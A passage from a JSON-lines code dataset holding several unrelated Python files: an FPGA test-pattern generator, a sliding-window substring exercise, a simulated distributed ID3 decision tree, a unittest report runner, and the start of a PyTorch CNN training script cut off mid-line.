ptn)\n\t\tpath_trf = os.path.join(self.path, trf)\n\t\tpath_rpt = os.path.join(self.path, self.file_list['RPT'])\n\t\tptn_start = 3 + self.trf_param['bs_len'] + 3\n\t\tvcd_len = self.trf_param['vcd_len']\n\t\twith open(path_ptn, 'rb') as fp, open(path_trf, 'rb') as ft, open(path_rpt, 'w') as fr:\n\t\t\tfp.seek(ptn_start * BIN_BYTE_WIDTH)\n\t\t\tptn_content = fp.read(vcd_len * BIN_BYTE_WIDTH)\n\t\t\twith open(os.path.join(self.path, 'stimulus.ptn'), 'wb') as fs:\n\t\t\t\tfs.write(ptn_content)\n\t\t\ttrf_content = ft.read()\n\t\t\tfor j in range(vcd_len):\n\t\t\t\tsym2val = {}\n\t\t\t\tptn_line = struct.unpack('>' + 'B' * 16, ptn_content[j*16:(j+1)*16])\n\t\t\t\ttrf_line = struct.unpack('>' + 'B' * 16, trf_content[j*16:(j+1)*16])\n\t\t\t\t# print(ptn_line, trf_line)\n\t\t\t\tdiff = map(find_diff, trf_line, ptn_line)\n\t\t\t\tfor i, byte_dict in enumerate(diff):\n\t\t\t\t\tfor bit, val in byte_dict.items():\n\t\t\t\t\t\tpos = (i + 1, bit)\n\t\t\t\t\t\tsig = pos2sig.setdefault(pos, 0) # Signal name, string.\n\t\t\t\t\t\tif sig == 0:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\telif sig in sig2sym: # Normal signal or distributed bus signal.\n\t\t\t\t\t\t\tsym2val[sig2sym[sig]] = val\n\t\t\t\t\t\telse: # Concentrated bus signal\n\t\t\t\t\t\t\tfor key in sig2sym:\n\t\t\t\t\t\t\t\tif re.sub(r'\\[\\d+\\]', '', sig) in key:\n\t\t\t\t\t\t\t\t\tsym2val[sig2sym[key]] = self.get_bus_val(trf_line, key)\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t# print(sym2val)\n\t\t\t\tfor sym, val in sym2val.items():\n\t\t\t\t\t# write report\n\t\t\t\t\tfr.write('Test result differs at line {}, signal {} = {}\\n'.format(j+1, self.sym2sig[sym], val))\n\n\tdef completion(self, fw):\n\t\tfor i in range(2048 - self.total_length % 2048):\n\t\t\t# fw.write(struct.pack('dd', 0, 0))\n\t\t\tfw.write(b'\\x00' * 16)\n\n\tdef write_attr(self):\n\t\twrite_path = os.path.join(self.path, self.project_name)\n\t\twith open(write_path, 'w') as fw:\n\t\t\tfw.write('\\n'.join(['%s = %s' % item for item in self.__dict__.items()]))\n\t\t\tfw.write('')\n\n\tdef write_command(self, fw):\n\t\tpos2val = {}\n\t\tfor key, flag in self.cmd2flag.items():\n\t\t\tvalue = get_sig_value(flag, self.tick)\n\t\t\tpos2val[self.cmd2pos[key]] = value\n\t\twrite_content(fw, pos2val)\n\t\tself.last_pos2val = pos2val\n\n\tdef write_bitstream(self, fw):\n\t\tpos2val = {}\n\t\tgen = self.rbt_generator(self.file_list['BIT'] + '.rbt')\n\t\t# zero_line_1 = b'\\x00' * 16\n\t\t# byte, bit = self.cclk_pos\n\t\t# zero_line_2 = b'\\x00' * (byte - 1) + struct.pack('B', 2 ** bit) + b'\\x00' * (16 - byte)\n\t\tself.base_0 = [0] * 16\n\t\tself.base_1 = [0] * 16\n\t\tfor key, flag in self.cmd2flag.items():\n\t\t\tvalue = get_sig_value(flag, self.tick)\n\t\t\tpos = self.cmd2pos[key]\n\t\t\tself.base_0[pos[0] - 1] += 2 ** pos[1] * int(value)\n\t\t\tself.base_1[pos[0] - 1] += 2 ** pos[1] * int(value)\n\t\tself.base_1[self.cclk_pos[0]-1] += 2 ** self.cclk_pos[1]\n\t\t# zero_line_1 = b'\\x00' * 9 + b'\\xc8' + b'\\x00' * 6\n\t\t# zero_line_2 = b'\\x00' * 9 + b'\\xca' + b'\\x00' * 6\n\t\tzero_line_0 = b''\n\t\tzero_line_1 = b''\n\t\tfor i in range(16):\n\t\t\tzero_line_0 += struct.pack('B', self.base_0[i])\n\t\t\tzero_line_1 += struct.pack('B', self.base_1[i])\n\t\tfor line in gen:\n\t\t\tif line[:32] == '0' * 32:\n\t\t\t\tfw.write(zero_line_0 + zero_line_1)\n\t\t\telse:\n\t\t\t\t# for key, flag in self.cmd2flag.items():\n\t\t\t\t# \tvalue = get_sig_value(flag, self.tick)\n\t\t\t\t# \tpos2val[self.cmd2pos[key]] = value\n\t\t\t\tfor i, value in enumerate(line.strip('\\n')):\n\t\t\t\t\tif i >= 32: # TODO: UGLY CODE!!!\n\t\t\t\t\t\tbreak\n\t\t\t\t\tsig = self.pos2data[i]\n\t\t\t\t\tpos = self.cmd2pos[sig]\n\t\t\t\t\tpos2val[pos] = value\n\t\t\t\twrite_content(fw, pos2val, base=self.base_0)\n\t\t\t\t# pos2val[self.cclk_pos] = 1\n\t\t\t\twrite_content(fw, pos2val, base=self.base_1)\n\t\t\tself.tick += 2\n\t\t\tself.total_length += 2\n\t\tdel gen\n\t\tself.last_pos2val = pos2val\n\t\tfor key, flag in self.cmd2flag.items():\n\t\t\tvalue = get_sig_value(flag, self.tick)\n\t\t\tself.last_pos2val[self.cmd2pos[key]] = value\n\t\tself.last_pos2val[self.cmd2pos['CCLK']] = 1\n\n\t# print(self.last_bs)\n\n\tdef write_nop(self, fw):\n\t\tstart = self.nop['start']\n\t\tcycle = self.nop['cycle']\n\t\t# print(start, cycle)\n\t\tfw.seek(-BIN_BYTE_WIDTH, 1) # Read last line.\n\t\tline = fw.read()\n\t\tfw.seek(0, 2)\n\t\tcclk_pos = self.cmd2pos['CCLK']\n\t\tif start == 'AFB':\n\t\t\tfor i in range(cycle):\n\t\t\t\tif self.last_pos2val[cclk_pos]:\n\t\t\t\t\tself.last_pos2val[cclk_pos] = 0\n\t\t\t\telse:\n\t\t\t\t\tself.last_pos2val[cclk_pos] = 1\n\t\t\t\twrite_content(fw, self.last_pos2val)\n\t\t\t\tself.tick += 1\n\t\t\t\tself.total_length += 1\n\t\telse:\n\t\t\tstart = int(start)\n\t\t\twhile self.tick <= start:\n\t\t\t\tfw.write(line)\n\t\t\t\tself.tick += 1\n\t\t\t\tself.total_length += 1\n\t\twrite_length(fw, self.tick)\n\t\tself.trf_param['bs_len'] = self.tick\n\n\tdef write_testbench(self, fw):\n\t\tself.total_length -= 1 # the first line will add an extra 1\n\t\tif 'normal' in self.config['command']:\n\t\t\tself.vcd_parser(fw)\n\t\telif 'legacy' in self.config['command']:\n\t\t\tself.txt_parser(fw)\n\n\t@timer\n\tdef write(self):\n\t\tpath = os.path.join(self.path, self.file_list['PTN'])\n\t\twith open(path, 'wb+') as fw:\n\t\t\twrite_mask(fw, self.cmd2pos, self.cmd2spio)\n\t\t\twrite_operator(fw, BITSTREAM_OP, 0)\n\t\t\tself.total_length += 3\n\t\t\twhile self.tick < self.bs_start:\n\t\t\t\t# print(self.tick)\n\t\t\t\tself.write_command(fw)\n\t\t\t\tself.tick += 1\n\t\t\t\tself.total_length += 1\n\t\t\tprint('Command complete')\n\t\t\tself.edge_check(fw) # Check clock edge.\n\t\t\tprint('Edge check complete')\n\t\t\tself.write_bitstream(fw)\n\t\t\tprint('Bitstream complete')\n\t\t\tself.write_nop(fw)\n\t\t\tprint('Nop complete')\n\t\t\tself.write_testbench(fw)\n\t\t\tprint('Testbench complete')\n\t\t\twrite_operator(fw, END_OP, 0)\n\t\t\tself.total_length += 1\n\t\t\tself.completion(fw)\n\t\t\tprint('2048-completion complete')\n\t\t\tself.save_temp()\n\t\t\tprint('Temp file saved')\n\t\t\tprint(\"Finished!\")\n\t\tdel fw\n\n\tdef save_temp(self):\n\t\tpath = os.path.join(self.path, \"temp.json\")\n\t\twith open(path, \"w+\") as f:\n\t\t\tjson.dump(self.trf_param, f)\n\t\t# ft = open(path, \"w+\")\n\t\t# # ft.write('\\n'.join(['%s = %s' % item for item in self.__dict__.items()]))\n\t\t# ft.write('trf_param = %s\\n' % str(self.trf_param))\n\t\t# ft.close()\n\n\tdef load_temp(self):\n\t\tpath = os.path.join(self.path, \"temp.json\")\n\t\twith open(path, \"r\") as f:\n\t\t\tself.trf_param = json.load(f)\n\t\t\tprint(self.trf_param)\n\t\t# fp = open(path, 'r')\n\t\t# for line in fp.readlines():\n\t\t# \texec('self.' + line)\n\t\t# print(self.trf_param)\n\n\n\"\"\"Main process and test\"\"\"\n\n\ndef batch_build(path, tfo):\n\tfile_list_list = tfo_parser(path, tfo)\n\tfor project_path, file_list in file_list_list.items():\n\t\tpattern = PatternGen(os.path.join(path, project_path), file_list=file_list)\n\t\tpattern.write()\n\n\n# @timer\ndef test():\n\t# pattern = PatternGen(path='pin_test', tfo_file='tfo_demo.tfo')\n\t# pattern = PatternGen('CLK', 'tfo_demo.tfo', '-legacy') # Test txt(vcd) format.\n\t# pattern = PatternGen('LX200', 'mul1.tfo', '-legacy') # Test bus.\n\t# pattern = PatternGen('stage1_horizontal_double_0', 'tfo_demo.tfo', '-legacy') # Test bus.\n\t# pattern = PatternGen('test_tri', 'tfo_demo.tfo') # Test trigate bus.\n\t# pattern = PatternGen('counter', 'tfo_demo.tfo') # type: PatternGen\n\t# pattern = PatternGen('test_tri_pro', 'tfo_demo.tfo') # Test trigate bus.\n\tpattern = PatternGen('mul5', 'tfo_demo.tfo')\n\t# pattern = PatternGen('mul1', 'tfo_demo.tfo')\n\n\tpattern.write()\n\t# print(pattern.sym2sig)\n\t# print(pattern.cmd2spio)\n\t# pattern.save_temp()\n\t# pattern.load_temp()\n\t# print(pattern.sym2sig)\n\t# pattern.trf2vcd('pin_test.trf', 'p4.vcd', flag='bypass')\n\t# pattern.trf2vcd('counter.trf', 'c3.vcd', flag='bypass')\n\t# pattern.trf2vcd('m8.trf', 'm11.vcd', flag='bypass')\n\t# pattern.trf2vcd('mul1_r.trf', 'mul1_r.vcd', flag='bypass')\n\t# pattern.compare_trf('counter.ptn', 'pruned_counter.trf')\n\t# pattern.compare_trf('mul5.ptn', 'm8.trf')\n\n\t# print(dir(pattern))\n\t# print(pattern.file_list)\n\t# print('\\n'.join(['%s = %s' % item for item in pattern.__dict__.items()]))\n\n\t# from mytools import compare_ptn\n\t# compare_ptn('counter/counter.ptn', 'counter/counter.ptn.bak1207')\n\n\t# from vcd2pic.vcd2pic import vcd2pic\n\t# vcd2pic('counter/c3.vcd', 'counter/c3.jpg')\n\n\t# a = [\n\t# \t('!', 'clk'), ('\"', 'ce'), ('#', 'sr'), ('$', 'rs'),\n\t# \t('%', ('ai', 3, 0)), ('&', 'ao[3]'), (\"'\", 'ao[2]'),\n\t# \t('(', 'ao[1]'), (')', 'ao[0]')\n\t# ]\n\t# print(expand_bus(a))\n\n\nif __name__ == \"__main__\":\n\tif len(sys.argv) == 1:\n\t\ttest()\n\telif len(sys.argv) == 3:\n\t\tpattern = PatternGen(sys.argv[1], sys.argv[2])\n\t\tpattern.write()\n\telif len(sys.argv) == 4:\n\t\tif sys.argv[3] == '-b':\n\t\t\tbatch_build(sys.argv[1], sys.argv[2])\n","sub_path":"mysite/Users/patternGen.py","file_name":"patternGen.py","file_ext":"py","file_size_in_byte":33548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"438181893","text":"'''\nLongest substring with no more than ‘k’ distinct characters\n\nProblem statement: Given a string, find the length of the longest substring in it with no more than K distinct characters.\n'''\n\n\ndef longestSubstringKChars(inputStr, k):\n ans = 0\n left = right = 0\n chars = {}\n res = []\n\n while right < len(inputStr):\n chars[inputStr[right]] = chars.get(inputStr[right], 0) + 1\n\n if len(chars) <= k:\n ans = max(ans, right - left + 1)\n res = inputStr[left:right+1]\n else:\n while len(chars) > k:\n leftChar = inputStr[left]\n if chars[leftChar] == 1:\n chars.pop(leftChar)\n else:\n chars[leftChar] -= 1\n left +=1\n right += 1\n \n return ans, res\n\nword = \"kolkata\"\nprint(longestSubstringKChars(word, 3))","sub_path":"DailyCodingProblems/src/python/longestSubstringKChars.py","file_name":"longestSubstringKChars.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"501076831","text":"#this will simulate the database connections\nimport math\nimport sys\nimport copy\n\n\n'''\n Class Database:\n This class will be used to simulate the database. the data attribute will hold the data\n The functions provided will be used to help the client retrieve its data\n'''\nclass Database():\n\n ''' --------init--------\n called when the Database object is created.\n Inputs: a string for the text file\n Output: the Database object\n '''\n def __init__(self,name,filename=None):\n #self.name = name\n self.data = [] #this will be a 2D matrix\n if filename != None:\n self.populate_data(filename)\n self.name = name\n\n ''' --------is_empty--------\n called to make sure the database has data\n Inputs: none\n Output: boolean value if there is data or not\n '''\n def is_empty(self):\n if self.data == []:\n return True\n else:\n return False\n\n ''' --------get_sum_of_decisions--------\n returns an x and y for a certain column based on the average\n Inputs: column integer and a search criteria list\n Output: a pair of x and y values\n Note: This should only be called from get_coloumn_information\n '''\n def get_sum_of_decisions(self,column,criteria):\n keys = []\n for i in range(len(self.data)):\n if self.data[i][column] not in keys:\n keys.append(self.data[i][column])\n\n rDict = dict.fromkeys(keys)\n for i in range(len(self.data)):\n #check the criteria on the row\n add_data = True\n for j in range(len(criteria)):\n if criteria[j][0] == -1:\n continue\n elif criteria[j][0] == '<' and self.data[i][j] < criteria[j][1]:\n continue\n elif criteria[j][0] == '>=' and self.data[i][j] >= criteria[j][1]:\n continue\n else:\n #if criteria[j][0] != -1 and criteria[j][0] != self.data[i][j]:\n add_data = False\n if add_data:\n if rDict.get(self.data[i][column]) == None:\n rDict[self.data[i][column]] = 1\n else:\n rDict[self.data[i][column]] += 1\n return (rDict)\n\n ''' --------get_sum_of_column--------\n returns an x and y for a certain column based on the average\n Inputs: column integer and a search criteria list\n Output: a pair of x and y values\n Note: This should only be called from get_coloumn_information\n '''\n def get_sum_of_column(self,column,criteria):\n key1 = '<'\n key2 = '>='\n \n keys = []\n keys.append(key1)\n keys.append(key2)\n #print(\"keys: \", keys)\n #print(\"column: %i\" % column)\n values = []\n #print(\"criteria: \", criteria)\n for i in range(len(self.data)):\n #print(\"data: %f\" % self.data[i][column])\n if criteria[column][0] == -1 or (criteria[column][0] == '<' and self.data[i][column] < criteria[column][1]) or (criteria[0] == '>=' and self.data[i][column] >= criteria[column][1]):\n #print(\" append the value\")\n values.append(self.data[i][column])\n values.sort()\n #print(\"values: \",values)\n value = values[int(len(values)/2)]\n #print(\"value: %f\" % value)\n rDict = dict.fromkeys(keys)\n for i in range(len(self.data)):\n #check the criteria on the row\n greater_increment = True\n less_increment = True\n \n for j in range(len(criteria)):\n if criteria[j][0] != -1 and criteria[j][0] == '<' and self.data[i][j] >= criteria[j][1]:\n less_increment = False\n elif criteria[j][0] != -1 and criteria[j][0] == '>=' and self.data[i][j] < criteria[j][1]:\n greater_increment = False\n\n if less_increment and self.data[i][column] < value:\n if rDict.get(key1) == None:\n rDict[key1] = 1\n else:\n rDict[key1] += 1\n elif greater_increment and self.data[i][column] >= value:\n if rDict.get(key2) == None:\n rDict[key2] = 1\n else:\n rDict[key2] += 1\n \n return (rDict)\n\n ''' --------get_column_information--------\n Called from the outside to get values for a specific column\n Inputs: a column value. if a -1 is passed it in, it will get\n infomration from the entire database\n also need to pass in a search criteria array\n Output: a pair of x and y values\n '''\n def get_column_information(self,column,criteria):\n #if column is -1, then we want to get all of the information\n # else we just get that columns attributes\n rDict = None\n \n if column == -1:\n for i in range(len(self.data[0])-1):\n temp_dict = self.get_sum_of_column(i,criteria)\n if rDict == None:\n rDict = temp_dict\n else:\n for key,value in temp_dict.items():\n rDict[key] += value\n return (rDict)\n else:\n return self.get_sum_of_column(column,criteria)\n\n ''' --------get_column_unique_ident--------\n returns length of unique keys in a column\n Inputs: column and search criteria\n Output: the length\n '''\n def get_column_unique_ident_length(self,column,criteria):\n rDict = self.get_sum_of_column(column,criteria)\n return len(rDict)\n\n ''' --------get_num_of_columns--------\n returns the number of attributes + 1\n Inputs: None\n Output: the number of attributes\n Note: Make sure you take the value and subtract by 1 if you don't want the last column\n '''\n def get_num_of_columns(self):\n return len(self.data[0])\n\n ''' --------get_num_of_rows--------\n returns the number of rows\n Inputs: None\n Output: the number of rows\n '''\n def get_num_of_rows(self):\n return len(self.data)\n\n ''' --------get_class_of_row--------\n returns the class of the row\n Inputs: row\n Output: the class\n '''\n def get_class_of_row(self,row):\n return self.data[row][-1]\n\n ''' --------populate_data--------\n loads the data into the data attribute from the data file\n Inputs: a string for the text file\n Output: None\n '''\n def populate_data(self,filename):\n try:\n infile = open(filename,'r')\n for line in infile:\n line = line.strip()\n linearr = line.split('\\t')\n temp = []\n if len(linearr) > 0:\n for item in linearr:\n \n temp.append(float(item.strip())) #get rid of whitespace\n self.data.append(temp)\n except Exception as err:\n print(err)\n\n ''' --------add_row--------\n add row to the data base\n Inputs: row\n Output: None\n '''\n def add_row(self,row):\n self.data.append(row)\n\n ''' --------get_class_of_row--------\n returns the row from the database\n Inputs: row number\n Output: the row\n '''\n def get_row(self,row):\n return self.data[row]\n\n ''' --------get_value_from_database--------\n returns the value from the database\n Inputs: row and column\n Output: the value\n '''\n def get_value_from_database(self,row,column):\n return self.data[row][column]\n\n def get_values(self,column):\n keys = []\n for i in range(len(self.data)):\n keys.append(self.data[i][column])\n return keys\n\n ''' --------print_data--------\n prints the data that is contained in the database\n Inputs: None\n Output: None\n '''\n def print_data(self):\n print('-----%s------' % self.name)\n for item in self.data:\n print(item)\n print('------------')\n\n def get_database_records(self, criteria):\n #print(self.get_value_from_database(0,self.get_num_of_columns()-2))\n #print(self.get_value_from_database(0,self.get_num_of_columns()-1))\n decisions = self.get_sum_of_decisions(self.get_num_of_columns()-1,criteria)\n #print (\"decisions: \",decisions)\n #get all unique decisions\n #for row in range(self.get_num_of_rows()):\n # get_row_data = True\n # for j in range(len(criteria)):\n # if criteria[j][0] == -1:\n # continue\n # elif criteria[j][0] == '<' and self.get_value_from_database(row,j) < float(criteria[j][1]):\n # continue\n # elif criteria[j][0] == '>=' and self.get_value_from_database(row,j) >= float(criteria[j][1]):\n # continue\n # else:\n # get_row_data = False\n # if get_row_data:\n # if decisions[self.get_value_from_database(row,self.get_num_of_columns()-1)] == None:\n # decisions[self.get_value_from_database(row,self.get_num_of_columns()-1)] = 1\n # else:\n # decisions[self.get_value_from_database(row,self.get_num_of_columns()-1)] += 1\n return decisions\n'''------END OF DATABASE CLASS-----------'''\n\n\n\n\n''' --------calculate_entropy--------\n Calculates the entropy from the pair of values\n Inputs: the x and y value\n Output: The entropy as a float\n'''\ndef calculate_entropy(entropy_dict):\n total = 0\n for key,value in entropy_dict.items():\n if value != None:\n total += value\n entropy = 0\n for key,value in entropy_dict.items():\n if value == None: \n continue\n entropy += ((value/total)*(math.log(value/total)))\n return (entropy * -1)\n\n''' --------update_dict--------\n Joins two dictionaries\n Inputs: the x and y value\n Output: The entropy as a float\n'''\ndef update_dict(rDict,temp_dict):\n if rDict == None:\n return temp_dict\n else:\n for key,value in temp_dict.items():\n if key not in rDict:\n rDict[key] = value\n elif rDict[key] == None:\n rDict[key] = value\n elif value != None:\n rDict[key] += value\n return rDict\n\n''' --------get_letter--------\n Gives the letter for the interger given\n Inputs: a value\n Output: a letter\n Note: This will not work for letters abouve 26. This needs to be fixed\n'''\ndef get_letter(value):\n return chr(value + 65)\n\n''' --------get_num_of_nodes--------\n Gives the number of nodes that should be spawned from the data set\n Inputs: the databases, column that spawns data and search criteria\n Output: the numebr of nodes\n'''\ndef get_num_of_nodes(databases,column,criteria):\n # this has been changed to always give back 2\n return 2\n #num_of_nodes = 0\n #for database in databases:\n #num = database.get_column_unique_ident(column,criteria)\n #if num > num_of_nodes:\n #num_of_nodes = num\n #return num_of_nodes\n\ndef ask_databases(databases,criteria):\n #get the classes that are a result\n classes = None\n for database in databases:\n \n temp_classes = database.get_database_records(criteria)\n classes = update_dict(classes,temp_classes)\n return classes\n\n''' --------populate_database--------\n Puts information into a database off of the search criteria\n Inputs: the databases and search criteria\n Output: the database\n'''\ndef populate_database(databases,criteria):\n temp_database = Database('temp_database')\n #print(\"Criteria: \",criteria)\n for database in databases:\n for row in range(database.get_num_of_rows()):\n bool1 = True\n bool2 = True\n add_row = True\n \n for j in range(len(criteria)):\n if criteria[j][0] == -1:\n continue\n elif criteria[j][0] == '<' and database.get_value_from_database(row,j) < float(criteria[j][1]):\n continue\n elif criteria[j][0] == '>=' and database.get_value_from_database(row,j) >= float(criteria[j][1]):\n continue\n else:\n add_row = False\n if add_row:\n temp_database.add_row(database.get_row(row))\n return temp_database\n\n''' --------populate_temp_databases--------\n Creates all the node databases give the column to spawn and serach criteria\n Inputs: the databases, temp_databases, column to spawn off of and search criteria\n Output: the temporary databases\n'''\ndef populate_temp_databases(databases,temp_databases,column,criteria):\n #this will need to be update to place items nicer\n #print(\"populating database with this criteria: \" , criteria)\n value = get_value_to_sort(databases, column)\n for database in databases:\n for row in range(database.get_num_of_rows()):\n add_greater_row = True\n add_lesser_row = True\n\n for j in range(len(criteria)):\n if criteria[j][0] != -1 or criteria[j][0] == '<' and database.get_value_from_database(row,j) >= criteria[j][1]:\n add_lesser_row = False\n if criteria[j][0] != -1 or criteria[j][0] == '>=' and database.get_value_from_database(row,j) < criteria[j][1]:\n add_greater_row = False\n\n if add_greater_row and database.get_value_from_database(row,column) >= value:\n temp_databases[1].add_row(database.get_row(row))\n elif add_lesser_row and database.get_value_from_database(row,column) < value:\n temp_databases[0].add_row(database.get_row(row))\n\n return temp_databases\n\n''' --------get_answer--------\n Gives the answer to the class of the database\n Inputs: the dictionary containg the database classes\n Output: the answer\n'''\ndef get_answer(dictionary):\n for key,value in dictionary.items():\n if value != None:\n return str(key)\n \ndef get_value_to_sort(databases,column):\n master_keys = []\n for database in databases:\n keys = database.get_values(column)\n for key in keys:\n master_keys.append(key)\n master_keys.sort()\n return master_keys[int(len(master_keys)/2)]\n \n\n''' --------id3_distributed--------\n recursive function that splits the databases and does the heavy lifting\n Inputs: the search criteria, the databases, the list to keep track of which columns have been spawned, the\n main_entropy, and the search path\n Output: None\n'''\ndef id3_distributed(criteria, databases, sorted_columns, main_entropy,path):#databases,columns,master_databases,total_records,sorted_columns):\n #we want to check the last values give our search tree criteria\n #more to come\n classes = None\n\n #temp_database = populate_database(databases,criteria)\n\n #need to only get the result numbers and the classes\n \n classes = ask_databases(databases,criteria)\n \n totalResults = 0\n temp = classes.items()\n items_not_none = 0\n for item in classes.items():\n \n if item[1] != None:\n totalResults += item[1]\n items_not_none += 1\n \n #temp_database.print_data()\n if totalResults == 0:\n print(\"There are no items in the database witht the currect search criteria \", criteria)\n print(\"Path: %s\" % path)\n return\n \n #classes = temp_database.get_sum_of_decisions(temp_database.get_num_of_columns() -1, criteria)\n if classes == None:\n print(\"ERROR THE CLASS IS NONE\")\n if items_not_none < 2:\n print(\"Path: %s ANSWER: %s\" % (path,get_answer(classes)))\n return\n \n #get the best attribute to split off of\n best_column = select_next_best_attribute(databases, sorted_columns, main_entropy, criteria)\n print(\"BEST_COLUMN: %i\" % (best_column))\n\n if best_column == -1:\n #if there are no more splits to occure we return\n print(\"can't determine an answer off of the current seach criteria \", criteria)\n print(\"Path: %s\" % path)\n return\n\n temp_sorted_columns = copy.deepcopy(sorted_columns)\n temp_sorted_columns[best_column] = 1\n \n #we need to split the tree node and call again\n #get the number of nodes that we need\n num_of_nodes = get_num_of_nodes(databases,best_column,criteria)\n\n temp_databases = []\n \n for i in range(num_of_nodes):\n temp_databases.append(Database('temp_d%i'%i))\n \n #put the correct information in here\n temp_databases = populate_temp_databases(databases,temp_databases,best_column,criteria)\n for i in range(len(temp_databases)):\n print('\\n--------------')\n\n temp_path = copy.deepcopy(path)\n temp_path += (\"Column: %s Attribute: %i -> \" % (get_letter(best_column),i+1))\n \n \n \n temp_criteria = copy.deepcopy(criteria)\n value = get_value_to_sort(databases,best_column)\n \n if i == 0:\n temp_criteria[best_column][0] = '<'\n temp_criteria[best_column][1] = value\n elif i ==1:\n temp_criteria[best_column][0] = '>='\n temp_criteria[best_column][1] = value\n \n print(\"When Column %s = %s%f\" % (get_letter(best_column),temp_criteria[best_column][0],temp_criteria[best_column][1]))\n \n print(\"going to option %i on columns %s\" %(i+1,get_letter(best_column)))\n \n id3_distributed(temp_criteria,databases,temp_sorted_columns,main_entropy,temp_path)\n\n''' --------select_next_best_attribute--------\n gives the best attribute that you should sort off of given parameters\n Inputs: the databses, list of columns that you can spawn off of, the main entropy, and the search criteria\n Output: the column to spawn off of\n''' \ndef select_next_best_attribute(databases,selected_columns,main_entropy,criteria):\n\n maxgain = [-1,-1]\n #print(\"Selecting next best attribute\")\n #print(\"Selected Columns: \",selected_columns)\n \n for i in range(databases[0].get_num_of_columns()-1):\n #print(\"Column: %i\" % i)\n if selected_columns[i] == 1:\n continue\n entropy_dict = None\n results = []\n \n for database in databases:\n temp_dict = database.get_column_information(i, criteria)\n #print(\" temp_dict \", temp_dict)\n entropy_dict = update_dict(entropy_dict,temp_dict)\n #print(\" entropy_dict \", entropy_dict)\n ratio = float(database.get_num_of_rows()/total_records)\n temp_entropy = calculate_entropy(entropy_dict)\n #print(temp_entropy)\n results.append(temp_entropy*ratio)\n weighted_avg = 0\n for items in results:\n weighted_avg += items\n if maxgain[1] < weighted_avg - main_entropy and weighted_avg > 0:\n maxgain[0] = i\n maxgain[1] = weighted_avg - main_entropy\n \n return maxgain[0]\n\nif __name__ == \"__main__\":\n\n #create the database objects\n d1 = Database(\"s1\",\"seed1.txt\")\n d2 = Database(\"s2\",\"seed2.txt\")\n d3 = Database(\"s3\",\"seed3.txt\")\n\n #show all of the information in the databases\n d1.print_data()\n d2.print_data()\n d3.print_data()\n\n #put the databases in a list\n databases = [d1,d2,d3]\n\n #create a list that keeps track of which columns have been selected to splpit off of\n sorted_columns = []\n criteria = []\n for i in range(d1.get_num_of_columns()-1):\n sorted_columns.append(-1)\n criteria.append([-1,None])\n print(d1.get_num_of_columns()-1)\n #calculate entropy\n entropy_dict = None\n total_records = 0\n for database in databases:\n total_records += database.get_num_of_rows()\n temp_dict = database.get_sum_of_decisions(database.get_num_of_columns()-1,criteria)\n print(\" temp_dict \", temp_dict)\n entropy_dict = update_dict(entropy_dict,temp_dict)\n print(\" entropy_dict \", entropy_dict)\n main_entropy = calculate_entropy(entropy_dict)\n print(\"main entropy: %f\" % main_entropy)\n\n\n\n #split that databases to make a decision tree\n id3_distributed(criteria,databases,sorted_columns, main_entropy, \"\")\n \n","sub_path":"database_revised.py","file_name":"database_revised.py","file_ext":"py","file_size_in_byte":20578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"551717904","text":"import unittest\nfrom common import HTMLTestRunner_cn\n\n#用例的路径\ncasepath=\"E:\\pythonlizi\\web_auto\\case\"\nrule=\"test*.py\"\ndiscover=unittest.defaultTestLoader.discover(start_dir=casepath,pattern=rule)\nprint(discover)\n\n#报告的路径\nreportpath=r\"E:\\pythonlizi\\web_auto\\report\\\\\" + \"report.html\"\n\nfp=open(reportpath,\"wb\")\n\nrunner=HTMLTestRunner_cn.HTMLTestRunner(stream=fp,title=\"测试的标题\")\nrunner.run(discover)\n\nfp.close()","sub_path":"web_auto/run_all.py","file_name":"run_all.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"495051330","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.data as Data\nimport torchvision\nimport matplotlib.pyplot as plt\nimport torch.cuda.nccl as nccl\nimport numpy\nimport scipy.io as sio\nimport torch.optim as optim\n\ntorch.manual_seed(1) # reproducible\n\n# Counter for the execution time\nstart = torch.cuda.Event(enable_timing=True)\nend = torch.cuda.Event(enable_timing=True)\nstart.record()\n\n\n# Hyper Parameters\nEPOCH = 1 # number of epochs\nBATCH_SIZE = 4 # used for training \n#BATCH_SIZE2 = 256 # used for test\nLR = 1e-4 # learning rate\nMM = 0.99 # momentum - used only with SGD optimizer\n\n# use 3 dropout values: one for the input image, one for convolution layers, one for final (linear) layers\nDROPOUT_INITIAL = 0\nDROPOUT_MIDDLE_1 = 0\nDROPOUT_MIDDLE_2 = 0\nDROPOUT_CLASSIFIER = 0\n\nRELU = True\n\nL_FIRST = 103\nL_SECOND = 103\nL_THIRD = 103\n#L_FOURTH = 32\nL_FIFTH = 2575 \nL_SIXTH = 81\nL_SEVENTH = 27\n\nTRAIN_VECTOR_SIZE = 200\nTRAIN_SIZE = 1800 # 3437\nTEST_SIZE = 40976\n\n# data is read from the file created in matlab\ndatabase = sio.loadmat('database200.mat')\n\n# data needed for the test is:\n# - changed to numpy type\n# - changed to torch type\n# - the grad is removed \n# - the form of matrix is changed for [number_of_elements, channels, height, width] \ntest_data = database['test_data']\ntest_data = numpy.array(test_data, dtype=numpy.float32)\ntest_data = torch.from_numpy(numpy.array(test_data))\ntest_data.requires_grad = False\ntest_data = test_data.permute(0,3,1,2)\n\ntest_target = database['test_target']\ntest_target = numpy.array(test_target, dtype=numpy.float32)\ntest_target = torch.from_numpy(numpy.array(test_target))\ntest_target.requires_grad = False\ntest_target = torch.t(test_target).type(torch.LongTensor).cuda()\n\ntrain_data = database['train_data']\ntrain_data = numpy.array(train_data, dtype=numpy.float32)\ntrain_data = torch.from_numpy(numpy.array(train_data))\ntrain_data.requires_grad = False\ntrain_data = train_data.permute(0,3,1,2)\n\ntrain_target = database['train_target']\ntrain_target = numpy.array(train_target, dtype=numpy.float32)\ntrain_target = torch.from_numpy(numpy.array(train_target))\ntrain_target.requires_grad = False\ntrain_target = torch.t(train_target).type(torch.LongTensor).cuda()\n\n\n# Data Loader for easy mini-batch return in training\ntrain_loader = Data.DataLoader(dataset 